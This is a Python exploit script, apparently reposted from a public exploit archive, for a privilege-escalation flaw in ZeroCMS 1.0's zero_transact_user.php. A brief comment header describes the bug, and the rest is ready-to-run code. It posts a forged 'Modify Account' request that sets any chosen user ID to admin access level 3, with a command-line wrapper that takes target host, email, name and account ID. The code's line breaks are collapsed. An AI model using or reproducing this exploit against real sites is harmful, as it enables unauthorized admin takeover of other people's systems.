ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation

Bài liên quan

import sys,getopt,cookielib,urllib2,urllib

# ZeroCMS 1.0

# zero_transact_user.php

# Impropper Form post hanling, (parameter polution)

# Vendor: Another Awesome Stuff

# Product web page: http://www.aas9.in/zerocms/

# author: tiago.alexand@gmail.com

# Tested on: php 5.4.27

# OSVDB ID: 108025

# description

# Summary: ZeroCMS is a very simple Content Management

# System built using PHP and MySQL.

# the script zero_transact_user.php contains a Modify Account case

# where the execution context doen't have in to consideration the current user's permitions

# allowing a malcious user to escalate its privileges to admin. 

def  exploit(host,email,name,userid):   access_level = 3 # default for admin   url = host + '/zero_transact_user.php' #the script handles user related actions   args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }   data = urllib.urlencode(args)   cj = cookielib.CookieJar()   opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))   response = opener.open(url,data);   print response.read()    def main(argv):   host = ''   email = ''   accountname = ''   userid = ''   try:      opts, args = getopt.getopt(argv,"hu:m:n:i:")   except getopt.GetoptError:      print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'      sys.exit(2)   for opt, arg in opts:      if opt == '-h':         print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'         sys.exit()      elif opt in ("-u"):         host = arg      elif opt in ("-m"):         email = arg      elif opt in ("-n"):         accountname = arg      elif opt in ("-i"):         userid = arg   exploit(host,email,accountname,userid)if __name__ == "__main__":   main(sys.argv[1:])